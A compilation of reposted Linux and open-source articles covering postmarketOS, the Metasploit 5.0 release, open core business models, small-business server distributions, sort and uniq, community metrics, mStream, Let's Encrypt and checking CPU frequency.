PostmarketOS brings old Androids back to life with Linux

This week the creators of postmarketOS came out of the shadows to show what they’ve been making for the past year. The software system they’ve created takes old Android devices – and some new – and boots an alternate operating system. This is a Linux distro that boots working software to Android devices that would otherwise be long outside their final official software update.

Before you get too excited about bringing your old smartphone back to life like Frankenstein’s Monster, know that this isn’t for everyone. In fact postmarketOS isn’t built to be used by MOST people. Instead it’s made for hackers, developers, and for those that wish to spend inordinate amounts of time fussing with software code to get their long-since-useful smartphone to a state in which it can do a thing or two.

At some point in the distant future, the creators of postmarketOS hope to develop “a sustainable, privacy and security focused free software mobile OS that is modeled after traditional Linux distributions.” To this end, they’ve got “over 100 booting devices” in a list with instructions how to load. This does not mean that every version WORKS right this minute.

Instead, the list is full of devices on which just a few tiny parts of the phone work. But for those that are super hardcore about loading new and interesting software to their old devices, this might well be enough. Devices from the very well known to the very, very rare are on this list – Fairphone 1 and 2, the Google Glass Explorer Edition, and the original HTC Desire are all here.

Speaking today on Reddit about the future of the project, user “ollieparanoid” suggested that “in the current state, this is aimed at developers, who are both sick of the current state of mobile phone operating systems, and who enjoy contributing to free software projects in their free time and thereby slowly improving the situation.” He added, “If the project should get abandoned at some point, then we still had contributed to other projects by everything we have upstreamed, and you might even benefit from these changes in the future even if you don’t realize it.”

Let us know if you jump in on the party. If you’ve got a device that’s not on the list, let the creators of the software know!

Source

Metasploit, popular hacking and security tool, gets long-awaited update

The open-source Metasploit Framework 5.0 has long been used by hackers and security professionals alike to break into systems. Now, this popular system penetration testing platform, which enables you to find, exploit, and validate security holes, has been given a long-delayed refresh.

Rapid7, Metasploit’s parent company, announced this first major release since 2011. It brings many new features and a fresh release cadence to the program. While the Framework has remained the same for years, the program was kept up to date and useful with weekly module updates.

Also: 7 tips for SMBs to improve data security TechRepublic

These modules contain the latest exploit code for applications, operating systems, and platforms. With these, you can both test your own network and hardware’s security… or attack others. Hackers and security pros alike can also leverage Metasploit Framework’s power to create additional custom security tools or write their own exploit code for new security holes.

With this release, Metasploit has new database and automation application programming interfaces (APIs), evasion modules, and libraries. It also includes expanded language support, improved performance, and ease of use. This, Rapid 7 claims, lays “the groundwork for better teamwork capabilities, tool integration, and exploitation at scale.” That said, if you want an easy-to-use web interface, you need to look to the commercial Metasploit Pro.

Specifically, while Metasploit still uses a Postgresql database backend, you can now run the database as a RESTful service. That enables you to run multiple Metasploit consoles and penetration tools simultaneously.

Metasploit has also opened its APIs to more users. In the past, Metasploit had its own unique APIs and network protocol and it still does. But to make it more accessible, it now has a much more accessible JSON-RPC API.

The Framework also now supports three different module languages: Go, Python, and Ruby. You can use all these to create new evasion modules. Evasion modules can be used to evade antivirus programs.

All modules can also now target multiple targets. Before this, you couldn’t execute an exploit module against multiple hosts at a time. You can now attempt mass attacks without writing a script or manual interaction. You can target multiple hosts by setting RHOSTS to a range of IPs or referencing a hosts file with the file:// option.

Also: The best facial recognition cameras you can buy today CNET

The new Metasploit also improved its module search mechanism. The net result is searching for module is much faster. Modules has also been given new metadata. So, for example, if you want to know if a module leaves artifacts on disk, you can search for it.

In addition, Metasploit’s new metashell feature, enables users to run sessions in the background, upload/download files, or run resource scripts. You could do this earlier, but you needed to upgrade to a Meterpreter session first. Meterpreter combines shell functionality and a Ruby client API. It’s overkill for many users, now that metashell supports more basic functions.

Looking ahead, Metasploit development now has two branches. There’s the 4.x stable branch that underpins Metasploit Pro and open-source projects, such as Kali Linux, ParrotSec Linux, and Metasploit Framework itself, and an unstable branch where core development is done.

Previously, a feature might sit in a pull request for months and still cause bugs when it was released in Kali Linux or Metasploit. Now, with an unstable branch, developers can iterate on features more quickly and thoroughly. The net result is Metasploit will be updated far more quickly going forward.

So, if you want to make sure your systems are locked down tight and as secure as possible, use Metasploit. After all, I can assure you, hackers will be using Metasploit to crack into your company for entirely different reasons.

Related Stories:

Source

Some Thoughts on Open Core

Why open core software is bad for the FOSS movement.

Nothing is inherently anti-business about Free and Open Source
Software (FOSS). In fact, a number of different business
models are built on top of FOSS. The best models are those
that continue to further FOSS by internal code contributions and
that advance the principles of Free Software in general. For instance,
there’s the support model, where a company develops free software
but sells expert support for it.

Here, I’d like to talk a bit about one
of the more problematic models out there, the open core model,
because it’s much more prevalent, and it creates some perverse incentives
that run counter
to Free Software principles.

If you haven’t heard about it, the open core business model is one
where a company develops free software (often a network service
intended to be run on a server) and builds a base set of users and
contributors of that free code base. Once there is a critical mass
of features, the company then starts developing an “enterprise”
version of the product that contains additional features aimed at
corporate use. These enterprise features might include things like
extra scalability, login features like LDAP/Active Directory support
or Single Sign-On (SSO) or third-party integrations, or it might just
be an overall improved version of the product with more code
optimizations and speed.

Because such a company wants to charge customers
to use the enterprise version, it creates a closed fork of the
free software code base, or it might provide the additional proprietary
features as modules so it has fewer problems with violating its
free software license.

The first problem with the open core model is that on its face it
doesn’t further principles behind Free Software, because core developer
time gets focused instead of writing and promoting proprietary
software. Instead of promoting the importance of the freedoms that
Free Software gives both users and developers, these companies often
just use FOSS as a kind of freeware to get an initial base of users
and as free crowdsourcing for software developers that develop the
base product when the company is small and cash-strapped. As the company
get more funding, it’s then able to hire the most active community
developers, so they then can stop working on the community edition and
instead work full-time on the company’s proprietary software.

This brings me to the second problem. The very nature of open core
creates a perverse situation where a company is incentivized to
put developer effort into improving the proprietary product (that
brings in money) and is de-incentivized to move any of those
improvements into the Free Software community edition. After all,
if the community edition gets more features, why would someone pay
for the enterprise edition? As a result, the community edition is
often many steps behind the enterprise edition, if it gets many
updates at all.

All of those productive core developers are instead
working on improving the closed code. The remaining community ends
up making improvements, often as (strangely enough) third-party modules,
because it can be hard to get the company behind an open core project
to accept modules that compete with its enterprise features.

What’s worse is that a lot of the so-called “enterprise” features
end up being focused on speed optimizations or basic security
features like TLS support—simple improvements you’d want in the
free software version. These speed or security improvements never
make their way into the community edition, because the company intends that only individuals will use that version.

The message from the company
is clear: although the company may support free software on its face
(at the beginning), it believes that free software is for hobbyists
and proprietary software is for professionals.

The final problem with the open core model is that after these
startups move to the enterprise phase and start making money, there
is zero incentive to start any new free software projects within
the company. After all, if a core developer comes up with a great
idea for an improvement or a new side project, that could be something
the company could sell, so it winds up under the proprietary software
“enterprise” umbrella.

Ultimately, the open core model is a version of Embrace, Extend
and Extinguish made famous by Microsoft, only designed for VC-backed
startups. The model allows startups to embrace FOSS when they are
cash- and developer-strapped to get some free development and users
for their software. The moment they have a base product that can
justify the next round of VC funding, they move from embracing to
extending the free “core” to add proprietary enterprise software.
Finally, the free software core gets slowly extinguished. Improvements
and new features in the core product slow to a trickle, as the
proprietary enterprise product gets the majority of developer time
and the differences between the two versions become too difficult
to reconcile. The free software version becomes a kind of freeware
demo for enterprise users to try out before they get the “real”
version. Finally, the community edition lags too far behind and is
abandoned by the company as it tries to hit the profitability phase
of its business and no longer can justify developer effort on
free software. Proprietary software wins, Free Software loses.

Source

Top 5 Linux Server Distributions | Linux.com

Ah, the age-old question: Which Linux distribution is best suited for servers? Typically, when this question is asked, the standard responses pop up:

  • RHEL
  • SUSE
  • Ubuntu Server
  • Debian
  • CentOS

However, in the name of opening your eyes to maybe something a bit different, I’m going to approach this a bit differently. I want to consider a list of possible distributions that are not only outstanding candidates but also easy to use, and that can serve many functions within your business. In some cases, my choices are drop-in replacements for other operating systems, whereas others require a bit of work to get them up to speed.

Some of my choices are community editions of enterprise-grade servers, which could be considered gateways to purchasing a much more powerful platform. You’ll even find one or two entries here to be duty-specific platforms. Most importantly, however, what you’ll find on this list isn’t the usual fare.

ClearOS

What is ClearOS? For home and small business usage, you might not find a better solution. Out of the box, ClearOS includes tools like intrusion detection, a strong firewall, bandwidth management tools, a mail server, a domain controller, and much more. What makes ClearOS stand out above some of the competition is its purpose is to server as a simple Home and SOHO server with a user-friendly, graphical web-based interface. From that interface, you’ll find an application marketplace (Figure 1), with hundreds of apps (some of which are free, whereas some have an associated cost), that makes it incredibly easy to extend the ClearOS featureset. In other words, you make ClearOS the platform your home and small business needs it to be. Best of all, unlike many other alternatives, you only pay for the software and support you need.

There are three different editions of ClearOS:

To make the installation of software even easier, the ClearOS marketplace allows you to select via:

  • By Function (which displays apps according to task)
  • By Category (which displays groups of related apps)
  • Quick Select File (which allows you to select pre-configured templates to get you up and running fast)

In other words, if you’re looking for a Linux Home, SOHO, or SMB server, ClearOS is an outstanding choice (especially if you don’t have the Linux chops to get a standard server up and running).

Fedora Server

You’ve heard of Fedora Linux. Of course you have. It’s one of the finest bleeding edge distributions on the market. But did you know the developers of that excellent Fedora Desktop distribution also has a Server edition? The Fedora Server platform is a short-lifecycle, community-supported server OS. This take on the server operating system enables seasoned system administrators, experienced with any flavor of Linux (or any OS at all), to make use of the very latest technologies available in the open source community. There are three key words in that description:

  • Seasoned
  • System
  • Administrators

In other words, new users need not apply. Although Fedora Server is quite capable of handling any task you throw at it, it’s going to require someone with a bit more Linux kung fu to make it work and work well. One very nice inclusion with Fedora Server is that, out of the box, it includes one of the finest open source, web-based interface for servers on the market. With Cockpit (Figure 2) you get a quick glance at system resources, logs, storage, network, as well as the ability to manage accounts, services, applications, and updates.

If you’re okay working with bleeding edge software, and want an outstanding admin dashboard, Fedora Server might be the platform for you.

NethServer

NethServer is about as no-brainer of a drop-in SMB Linux server as you’ll find. With the latest iteration of NethServer, your small business will enjoy:

  • Built-in Samba Active Directory Controller
  • Seamless Nextcloud integration
  • Certificate management
  • Transparent HTTPS proxy
  • Firewall
  • Mail server and filter
  • Web server and filter
  • Groupware
  • IPS/IDS or VPN

All of the included features can be easily configured with a user-friendly, web-based interface that includes single-click installation of modules to expand the NethServer feature set (Figure 3) What sets NethServer apart from ClearOS is that it was designed to make the admin job easier. In other words, this platform offers much more in the way of flexibility and power. Unlike ClearOS, which is geared more toward home office and SOHO deployments, NethServer is equally at home in small business environments.

Rockstor

Rockstor is a Linux and Btfrs powered advanced Network Attached Storage (NAS) and Cloud storage server that can be deployed for Home, SOHO, as well as small- and mid-sized businesses alike. With Rockstor, you get a full-blown NAS/Cloud solution with a user-friendly, web-based GUI tool that is just as easy for admins to set up as it is for users to use. Once you have Rockstor deployed, you can create pools, shares, snapshots, manage replication and users, share files (with the help of Samba, NFS, SFTP, and AFP), and even extend the featureset, thanks to add-ons (called Rock-ons). The list of Rock-ons includes:

  • CouchPotato (Downloader for usenet and bittorrent users)
  • Deluge (Movie downloader for bittorrent users)
  • EmbyServer (Emby media server)
  • Ghost (Publishing platform for professional bloggers)
  • GitLab CE (Git repository hosting and collaboration)
  • Gogs Go Git Service (Lightweight Git version control server and front end)
  • Headphones (An automated music downloader for NZB and Torrent)
  • Logitech Squeezebox Server for Squeezebox Devices
  • MariaDB (Relational database management system)
  • NZBGet (Efficient usenet downloader)
  • OwnCloud-Official (Secure file sharing and hosting)
  • Plexpy (Python-based Plex Usage tracker)
  • Rocket.Chat (Open Source Chat Platform)
  • SaBnzbd (Usenet downloader)
  • Sickbeard (Internet PVR for TV shows)
  • Sickrage (Automatic Video Library Manager for TV Shows)
  • Sonarr (PVR for usenet and bittorrent users)
  • Symform (Backup service)

Rockstor also includes an at-a-glance dashboard that gives admins quick access to all the information they need about their server (Figure 4).

Zentyal

Zentyal is another Small Business Server that does a great job of handling multiple tasks. If you’re looking for a Linux distribution that can handle the likes of:

  • Directory and Domain server
  • Mail server
  • Gateway
  • DHCP, DNS, and NTP server
  • Certification Authority
  • VPN
  • Instant Messaging
  • FTP server
  • Antivirus
  • SSO authentication
  • File sharing
  • RADIUS
  • Virtualization Management
  • And more

Zentyal might be your new go-to. Zentyal has been around since 2004 and is based on Ubuntu Server, so it enjoys a rock-solid base and plenty of applications. And with the help of the Zentyal dashboard (Figure 5), admins can easily manage:

  • System
  • Network
  • Logs
  • Software updates and installation
  • Users/groups
  • Domains
  • File sharing
  • Mail
  • DNS
  • Firewall
  • Certificates
  • And much more

Adding new components to the Zentyal server is as simple as opening the Dashboard, clicking on Software Management > Zentyal Components, selecting what you want to add, and clicking Install. The one issue you might find with Zentyal is that it doesn’t offer nearly the amount of addons as you’ll find in the likes of Nethserver and ClearOS. But the services it does offer, Zentyal does incredibly well.

Plenty More Where These Came From

This list of Linux servers is clearly not exhaustive. What it is, however, is a unique look at the top five server distributions you’ve probably not heard of. Of course, if you’d rather opt to use a more traditional Linux server distribution, you can always stick with CentOS, Ubuntu Server, SUSE, Red Hat Enterprise Linux, or Debian… most of which are found on every list of best server distributions on the market. If, however, you’re looking for something a bit different, give one of these five distos a try.

Learn more about Linux through the free “Introduction to Linux” course from The Linux Foundation and edX.

Source

Back to Basics: Sort and Uniq | Linux.com

""

Learn the fundamentals of sorting and de-duplicating text on the command line.

If you’ve been using the command line for a long time, it’s easy to take the commands you use every day for granted. But, if you’re new to the Linux command line, there are several commands that make your life easier that you may not stumble upon automatically. In this article, I cover the basics of two commands that are essential in anyone’s arsenal: sort and uniq.

The sort command does exactly what it says: it takes text data as input and outputs sorted data. There are many scenarios on the command line when you may need to sort output, such as the output from a command that doesn’t offer sorting options of its own (or the sort arguments are obscure enough that you just use the sort command instead). In other cases, you may have a text file full of data (perhaps generated with some other script), and you need a quick way to view it in a sorted form.

Let’s start with a file named “test” that contains three lines:


Foo
Bar
Baz

sort can operate either on STDIN redirection, the input from a pipe, or, in the case of a file, you also can just specify the file on the command. So, the three following commands all accomplish the same thing:


cat test | sort
sort < test
sort test

And the output that you get from all of these commands is:


Bar
Baz
Foo

Sorting Numerical Output

Now, let’s complicate the file by adding three more lines:


Foo
Bar
Baz
1. ZZZ
2. YYY
11. XXX

If you run one of the above sort commands again, this time, you’ll see different output:


11. XXX
1. ZZZ
2. YYY
Bar
Baz
Foo

This is likely not the output you wanted, but it points out an important fact about sort. By default, it sorts alphabetically, not numerically. This means that a line that starts with “11.” is sorted above a line that starts with “1.”, and all of the lines that start with numbers are sorted above lines that start with letters.

To sort numerically, pass sort the -n option:


sort -n test

Bar
Baz
Foo
1. ZZZ
2. YYY
11. XXX

Find the Largest Directories on a Filesystem

Numerical sorting comes in handy for a lot of command-line output—in particular, when your command contains a tally of some kind, and you want to see the largest or smallest in the tally. For instance, if you want to find out what files are using the most space in a particular directory and you want to dig down recursively, you would run a command like this:


du -ckx

This command dives recursively into the current directory and doesn’t traverse any other mountpoints inside that directory. It tallies the file sizes and then outputs each directory in the order it found them, preceded by the size of the files underneath it in kilobytes. Of course, if you’re running such a command, it’s probably because you want to know which directory is using the most space, and this is where sortcomes in:


du -ckx | sort -n

Now you’ll get a list of all of the directories underneath the current directory, but this time sorted by file size. If you want to get even fancier, pipe its output to the tail command to see the top ten. On the other hand, if you wanted the largest directories to be at the top of the output, not the bottom, you would add the-r option, which tells sort to reverse the order. So to get the top ten (well, top eight—the first line is the total, and the next line is the size of the current directory):


du -ckx | sort -rn | head

This works, but often people using the du command want to see sizes in more readable output than kilobytes. The du command offers the -h argument that provides “human-readable” output. So, you’ll see output like 9.6G instead of 10024764 with the -k option. When you pipe that human-readable output to sort though, you won’t get the results you expect by default, as it will sort 9.6G above 9.6K, which would be above 9.6M.

The sort command has a -h option of its own, and it acts like -n, but it’s able to parse standard human-readable numbers and sort them accordingly. So, to see the top ten largest directories in your current directory with human-readable output, you would type this:


du -chx | sort -rh | head

Removing Duplicates

The sort command isn’t limited to sorting one file. You might pipe multiple files into it or list multiple files as arguments on the command line, and it will combine them all and sort them. Unfortunately though, if those files contain some of the same information, you will end up with duplicates in the sorted output.

To remove duplicates, you need the uniq command, which by default removes any duplicate lines that are adjacent to each other from its input and outputs the results. So, let’s say you had two files that were different lists of names:


cat namelist1.txt
Jones, Bob
Smith, Mary
Babbage, Walter

cat namelist2.txt
Jones, Bob
Jones, Shawn
Smith, Cathy

You could remove the duplicates by piping to uniq:


sort namelist1.txt namelist2.txt | uniq
Babbage, Walter
Jones, Bob
Jones, Shawn
Smith, Cathy
Smith, Mary

The uniq command has more tricks up its sleeve than this. It also can output only the duplicated lines, so you can find duplicates in a set of files quickly by adding the -d option:


sort namelist1.txt namelist2.txt | uniq -d
Jones, Bob

You even can have uniq provide a tally of how many times it has found each entry with the -c option:


sort namelist1.txt namelist2.txt | uniq -c
1 Babbage, Walter
2 Jones, Bob
1 Jones, Shawn
1 Smith, Cathy
1 Smith, Mary

As you can see, “Jones, Bob” occurred the most times, but if you had a lot of lines, this sort of tally might be less useful for you, as you’d like the most duplicates to bubble up to the top. Fortunately, you have the sort command:


sort namelist1.txt namelist2.txt | uniq -c | sort -nr
2 Jones, Bob
1 Smith, Mary
1 Smith, Cathy
1 Jones, Shawn
1 Babbage, Walter

Conclusion

I hope these cases of using sort and uniq with realistic examples show you how powerful these simple command-line tools are. Half the secret with these foundational command-line tools is to discover (and remember) they exist so that they’ll be at your command the next time you run into a problem they can solve.

Source

What Metrics Matter: A Guide for Open Source Projects

metrics and data shown on a computer screen

“Without data, you’re just a person with an opinion.”

Those are the words of W. Edwards Deming, the champion of statistical process control, who was credited as one of the inspirations for what became known as the Japanese post-war economic miracle of 1950 to 1960. Ironically, Japanese manufacturers like Toyota were far more receptive to Deming’s ideas than General Motors and Ford were.

Community management is certainly an art. It’s about mentoring. It’s about having difficult conversations with people who are hurting the community. It’s about negotiation and compromise. It’s about interacting with other communities. It’s about making connections. In the words of Red Hat’s Diane Mueller, it’s about “nurturing conversations.”

However, it’s also about metrics and data.

Some have much in common with software development projects more broadly. Others are more specific to the management of the community itself. I think of deciding what to measure and how as adhering to five principles.

1. Recognize that behaviors aren’t independent of the measurements you choose to highlight.

In 2008, Daniel Ariely published Predictably Irrational, one of a number of books written around that time that introduced behavioral psychology and behavioral economics to the general public. One memorable quote from that book is the following: “Human beings adjust behavior based on the metrics they’re held against. Anything you measure will impel a person to optimize his score on that metric. What you measure is what you’ll get. Period.”

This shouldn’t be surprising. It’s a finding that’s been repeatedly confirmed by research. It should also be familiar to just about anyone with business experience. It’s certainly not news to anyone in sales management, for example. Base sales reps’ (or their managers’) bonuses solely on revenue, and they’ll try to discount whatever it takes to maximize revenue, even if it puts margin in the toilet. Conversely, want the sales force to push a new product line—which will probably take extra effort—but skip the spiffs? Probably not happening.

And lest you think I’m unfairly picking on sales, this behavior is pervasive, all the way up to the CEO, as Ariely describes in a 2010 Harvard Business Reviewarticle: “CEOs care about stock value because that’s how we measure them. If we want to change what they care about, we should change what we measure.”

Developers and other community members are not immune.

2. You need to choose relevant metrics.

There’s a lot of folk wisdom floating around about what’s relevant and important that’s not necessarily true. My colleague Dave Neary offers an example from baseball: “In the late ’90s, the key measurements that were used to measure batter skill were RBI (runs batted in) and batting average (how often a player got on base with a hit, divided by the number of at-bats). The Oakland A’s were the first major league team to recruit based on a different measurement of player performance: on-base percentage. This measures how often they get to first base, regardless of how it happens.”

Indeed, the whole revolution of sabermetrics in baseball and elsewhere, which was popularized in Michael Lewis’ Moneyball, often gets talked about in terms of introducing data in a field that historically was more about gut feel and personal experience. But it was also about taking a game that had actually always been fairly numbers-obsessed and coming up with new metrics based on mostly existing data to better measure player value. (The data revolution going on in sports today is more about collecting much more data through video and other means than was previously available.)

3. Quantity may not lead to quality.

As a corollary, collecting lots of tangential but easy-to-capture data isn’t better than just selecting a few measurements you’ve determined are genuinely useful. In a world where online behavior can be tracked with great granularity and displayed in colorful dashboards, it’s tempting to be distracted by sheer data volume, even when it doesn’t deliver any great insight into community health and trajectory.

This may seem like an obvious point: Why measure something that isn’t relevant? In practice, metrics often get chosen because they’re easy to measure, not because they’re particularly useful. They tend to be more about inputs than outputs: The number of developers. The number of forum posts. The number of commits. Collectively, measures like this often get called vanity metrics. They’re ubiquitous, but most people involved with community management don’t think much of them.

Number of downloads may be the worst of the bunch. It’s true that, at some level, they’re an indication of interest in a project. That’s something. But it’s sufficiently distant from actively using the project, much less engaging with the project deeply, that it’s hard to view downloads as a very useful number.

Is there any harm in these vanity metrics? Yes, to the degree that you start thinking that they’re something to base action on. Probably more seriously, stakeholders like company management or industry observers can come to see them as meaningful indicators of project health.

4. Understand what measurements really mean and how they relate to each other.

Neary makes this point to caution against myopia. “In one project I worked on,” he says, ”some people were concerned about a recent spike in the number of bug reports coming in because it seemed like the project must have serious quality issues to resolve. However, when we looked at the numbers, it turned out that many of the bugs were coming in because a large company had recently started using the project. The increase in bug reports was actually a proxy for a big influx of new users, which was a good thing.”

In practice, you often have to measure through proxies. This isn’t an inherent problem, but the further you get between what you want to measure and what you’re actually measuring, the harder it is to connect the dots. It’s fine to track progress in closing bugs, writing code, and adding new features. However, those don’t necessarily correlate with how happy users are or whether the project is doing a good job of working towards its long-term objectives, whatever those may be.

5. Different measurements serve different purposes.

Some measurements may be non-obvious but useful for tracking the success of a project and community relative to internal goals. Others may be better suited for a press release or other external consumption. For example, as a community manager, you may really care about the number of meetups, mentoring sessions, and virtual briefings your community has held over the past three months. But it’s the number of contributions and contributors that are more likely to grab the headlines. You probably care about those too. But maybe not as much, depending upon your current priorities.

Still, other measurements may relate to the goals of any sponsoring organizations. The measurements most relevant for projects tied to commercial products are likely to be different from pure community efforts.

Because communities differ and goals differ, it’s not possible to simply compile a metrics checklist, but here are some ideas to think about:

Consider qualitative metrics in addition to quantitative ones. Conducting surveys and other studies can be time-consuming, especially if they’re rigorous enough to yield better-than-anecdotal data. It also requires rigor to construct studies so that they can be used to track changes over time. In other words, it’s a lot easier to measure quantitative contributor activity than it is to suss out if the community members are happier about their participation today than they were a year ago. However, given the importance of culture to the health of a community, measuring it in a systematic way can be a worthwhile exercise.

Breadth of community, including how many are unaffiliated with commercial entities, is important for many projects. The greater the breadth, the greater the potential leverage of the open source development process. It can also be instructive to see how companies and individuals are contributing. Projects can be explicitly designed to better accommodate casual contributors.

Are new contributors able to have an impact, or are they ignored? How long does it take for code contributions to get committed? How long does it take for a reported bug to be fixed or otherwise responded to? If they asked a question in a forum, did anyone answer them? In other words, are you letting contributors contribute?

Advancement within the project is also an important metric. Mikeal Rogers of the Node.js community explains: “The shift that we made was to create a support system and an education system to take a user and turn them into a contributor, first at a very low level, and educate them to bring them into the committer pool and eventually into the maintainer pool. The end result of this is that we have a wide range of skill sets. Rather than trying to attract phenomenal developers, we’re creating new phenomenal developers.”

Whatever metrics you choose, don’t forget why you made them metrics in the first place. I find a helpful question to ask is: “What am I going to do with this number?” If the answer is to just put it in a report or in a press release, that’s not a great answer. Metrics should be measurements that tell you either that you’re on the right path or that you need to take specific actions to course-correct.

For this reason, Stormy Peters, who handles community leads at Red Hat, argues for keeping it simple. She writes, “It’s much better to have one or two key metrics than to worry about all the possible metrics. You can capture all the possible metrics, but as a project, you should focus on moving one. It’s also better to have a simple metric that correlates directly to something in the real world than a metric that is a complicated formula or ration between multiple things. As project members make decisions, you want them to be able to intuitively feel whether or not it will affect the project’s key metric in the right direction.”

Source

A Personal Streaming Server to Stream Music from Anywhere

mStream is a free, open source and cross-platform personal music streaming server that lets you sync and stream music between all your devices. It consists of a lightweight music streaming server written with NodeJS; you can use it to stream your music from your home computer to any device, anywhere.

Server Features

  • Works on Linux, Windows, OSX and Raspbian
  • Dependency Free Installation
  • Light on memory and CPU usage
  • Tested on multi-terabyte libraries

WebApp Features

  • Gapless Playback
  • Milkdrop Visualizer
  • Playlist Sharing
  • Upload Files through the file explorer
  • AutoDJ – Queues up random songs

Importantly, mStream Express is a special version of the server that comes with all the dependencies pre-packaged and in this article, we will explain how to install and use mStream to stream your home music to anywhere from the Linux.

Before you install mStream, check out the demo: https://demo.mstream.io/

How to Install mStream Express in Linux

The easiest way to install mStream, without facing any dependencies issues is to download the latest version of mStream Express from the release page and run it.

The package comes with an additional set of UI tools and features for adding tray icon for easy server management, auto boots server on startup and GUI tools for server configuration.

You can use the wget command to download it directly from the command line, unzip the archive file, move into the extracted folder and run the mstreamExpress file as follows.

$ wget -c https://github.com/IrosTheBeggar/mStream/releases/download/3.9.1/mstreamExpress-linux-x64.zip
$ unzip mstreamExpress-linux-x64.zip 
$ cd mstreamExpress-linux-x64/
$ ./mstreamExpress

After starting mstreamExpress, the server configuration interface will show up as shown in the following screenshot. Enter the config options and click on Boot Server.

Configure mStream Express Server

Configure mStream Express Server

Once the server has booted, you will see the following messages.

mStream Express Server Started

mStream Express Server Started

To access the webapp, go to the address: http://localhost:3000 or http://server_ip:3000.

Access mStream Webapp

Access mStream Webapp

You can easily manage the server via the Tray Icon; it has options to disable auto-boot, restart and reconfigure, advanced options, manage DDNS and SSL, among others.

mStream Github repositoryhttps://github.com/IrosTheBeggar/mStream.

That’s all! mStream is an easy to install and personal music streaming software. In this article, we showed how to easily install and use mStream Express in Linux. If you have any queries, reach us via the feedback form below.

Source

Protect Your Websites with Let’s Encrypt

Learn how to use Let’s Encrypt in this tutorial from our archives.

Back in the bad old days, setting up basic HTTPS with a certificate authority cost as much as several hundred dollars per year, and the process was difficult and error-prone to set up. Now we have Let’s Encrypt for free, and the whole thing takes just a few minutes.

Why Encrypt?

Why encrypt your sites? Because unencrypted HTTP sessions are wide open to multiple abuses:

Internet service providers lead the code-injecting offenders. How to foil their nefarious desires? Your best defense is HTTPS. Let’s review how HTTPS works.

Chain of Trust

You could set up asymmetric encryption between your site and everyone who is allowed to access it. This is very strong protection: GPG (GNU Privacy Guard, see How to Encrypt Email in Linux), and OpenSSH are common tools for asymmetric encryption. These rely on public-private key pairs. You can freely share public keys, while your private keys must be protected and never shared. The public key encrypts, and the private key decrypts.

This is a multi-step process that does not scale for random web-surfing, however, because it requires exchanging public keys before establishing a session, and you have to generate and manage key pairs. An HTTPS session automates public key distribution, and sensitive sites, such as shopping and banking, are verified by a third-party certificate authority (CA) such as Comodo, Verisign, or Thawte.

When you visit an HTTPS site, it provides a digital certificate to your web browser. This certificate verifies that your session is strongly encrypted and supplies information about the site, such as organization’s name, the organization that issued the certificate, and the name of the certificate authority. You can see all of this information, and the digital certificate, by clicking on the little padlock in your web browser’s address bar (Figure 1).

The major web browsers, including Opera, Firefox, Chromium, and Chrome, all rely on the certificate authority to verify the authenticity of the site’s digital certificate. The little padlock gives the status at a glance; green = strong SSL encryption and verified identity. Web browsers also warn you about malicious sites, sites with incorrectly configured SSL certificates, and they treat self-signed certificates as untrusted.

So how do web browsers know who to trust? Browsers include a root store, a batch of root certificates, which are stored in /usr/share/ca-certificates/mozilla/. Site certificates are verified against your root store. Your root store is maintained by your package manager, just like any other software on your Linux system. On Ubuntu, they are supplied by the ca-certificates package. The root store itself is maintained by Mozilla for Linux.

As you can see, it takes a complex infrastructure to make all of this work. If you perform any sensitive online transactions, such as shopping or banking, you are trusting a whole lot of unknown people to protect you.

Encryption Everywhere

Let’s Encrypt is a global certificate authority, similar to the commercial CAs. Let’s Encrypt was founded by the non-profit Internet Security Research Group (ISRG) to make it easier to secure Websites. I don’t consider it sufficient for shopping and banking sites, for reasons which I will get to shortly, but it’s great for securing blogs, news, and informational sites that don’t have financial transactions.

There are at least three ways to use Let’s Encrypt. The best way is with the Certbot client, which is maintained by the Electronic Frontier Foundation (EFF). This requires shell access to your site.

If you are on shared hosting then you probably don’t have shell access. The easiest method in this case is using a host that supports Let’s Encrypt.

If your host does not support Let’s Encrypt, but supports custom certificates, then you can create and upload your certificate manually with Certbot. It’s a complex process, so you’ll want to study the documentation thoroughly.

When you have installed your certificate use SSL Server Test to test your site.

Let’s Encrypt digital certificates are good for 90 days. When you install Certbot it should also install a cron job for automatic renewal, and it includes a command to test that the automatic renewal works. You may use your existing private key or certificate signing request (CSR), and it supports wildcard certificates.

Limitations

Let’s Encrypt has some limitations: it performs only domain validation, that is, it issues a certificate to whoever controls the domain. This is basic SSL. It does not support Organization Validation (OV) or Extended Validation (EV) because it is not possible to automate identity validation. I would not trust a banking or shopping site that uses Let’s Encrypt– let ’em spend the bucks for a complete package that includes identity validation.

As a free-of-cost service run by a non-profit organization there is no commercial support, but only documentation and community support, both of which are quite good.

The Internet is full of malice. Everything should be encrypted. Start with Let’s Encrypt to protect your site visitors.

Source

How to find cpu minimum, current & maximum frequency in linux ?

How to find cpu minimum, current & maximum frequency in linux ?

cpu manufacturers pro-grammatically reduce the frequency of the processor. You can find out the current and possible frequency with the command:


How to find available frequencies ?


cat  /sys/devices/system/cpu/cpu*/cpufreq/scaling_available_frequencies


Sample output:


cat  /sys/devices/system/cpu/cpu*/cpufreq/scaling_available_frequencies
2933000 2128000 1596000
2933000 2128000 1596000


Finding each core   minimum, current & maximum frequency


grep ” /sys/devices/system/cpu/cpu0/cpufreq/scaling_{min,cur,max}_freq


Sample output:


/sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq:1596000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq:1596000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq:2933000


Here we can see that the current processor frequency-1596 Mhz and the maximum-2933 Mhz.


Above example for core 0 if you have N number of cores use *:


grep ” /sys/devices/system/cpu/cpu*/cpufreq/scaling_{min,cur,max}_freq


Sample output :


/sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq:1596000
/sys/devices/system/cpu/cpu1/cpufreq/scaling_min_freq:1596000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq:1596000
/sys/devices/system/cpu/cpu1/cpufreq/scaling_cur_freq:2128000
/sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq:2933000
/sys/devices/system/cpu/cpu1/cpufreq/scaling_max_freq:2933000


How to find cpu count ?


grep -c ‘model name’ /proc/cpuinfo


Sample output :


2
Use various performance governors.

ondemand: The CPU freq governor “on-demand” sets the CPU depending on the current usage.

To do this the CPU must have the capability to switch the frequency very quickly.
conservative: The CPU freq governor “conservative”, much like the “on-demand” governor, sets
the CPU depending on the current usage. It differs in behavior in that it gracefully increases
and decreases the CPU speed rather than jumping to max speed the moment there is any
load on the CPU. This behavior is more suitable in a battery powered environment.
